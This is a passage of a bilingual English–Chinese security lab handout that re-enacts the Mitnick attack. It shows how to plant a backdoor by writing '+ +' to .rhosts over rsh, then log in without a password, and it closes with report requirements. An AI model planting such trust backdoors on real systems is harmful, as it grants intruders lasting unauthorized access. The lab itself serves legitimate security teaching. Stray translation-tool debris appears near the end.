6 Task 3: Set Up a Backdoor(设置后门)

In Task 2, we only run a touch command in the attack to prove that we can successfully run a command on X-Terminal. If we want to run more commands later, we can always launch the same attack. That is quite inconvenient.

在任务2，我们在攻击中仅运行了一个touch命令来证明我们成功在X终端上运行了一个命令。如果我们想之后运行更多命令，我们可以总是发起相同的攻击。但这相当不方便。

Mitnick did plan to come back to X-Terminal. Instead of launching the attack again and again, he planted a backdoor in X-Terminal after his initial attack. This backdoor allowed him to log into X-Terminal normally anytime he wanted, without typing any password. To achieve this goal, as we have discussed in Section , all we need to do is to add the string “+ +” to the .rhosts file (in a single line). We can include the following command in our rsh data.

米特尼克计划重回X终端。他计划在他的初始化攻击后在X终端上留下一个后门，而非每次重复发起该攻击。按理来说该后门允许他在任意他想要的时刻登录X终端，而无需输入任何密码。为实现这一目标，正如我们之前讨论的，我们需要做的就是添加“+ +”到.rhosts文件（在单独的一行中）。我们可以在我们的rsh数据中包含以下命令。

echo + + > .rhosts

Students should replace the rsh command in Task 2 with the echo command above, and then repeat the attack. If the attack succeeds, the attacker should be able to remotely log into X-Terminal using the following command, and no password is needed:

学生需要使用echo命令替换在任务2中的rsh命令，然后重复攻击。如果攻击成功，攻击者应该可以使用以下命令远程登录到X终端并且不需要使用密码：

$ rsh [X-Terminal’s IP]

7 Submission（投稿）

Students need to submit a detailed lab report to describe what they have done, what they have observed, and how they interpret（解释） the results. Reports should include evidences to support the observations（观察）. Evidences include packet traces, screenshots, etc. Reports should also list the important code snippets（片段） with explanations. Simply attaching code without any explanation will not receive credits.

学生需要提交一份细节实验报告来描述他们做了什么，他们有什么样的发现，以及他们是如何解释结果的。报告应该包含证据以支持其观察。证据包含数据包追踪，屏幕截图等等。报告应该列出重要的代码片段及其解释说明。简单的攻击代码同时不包含任何解释将无法获得学分。
194/5000

证据包括数据包跟踪，屏幕截图等。报告还应列出重要的代码片段以及说明。 仅附加代码而没有任何解释将不会获得学分。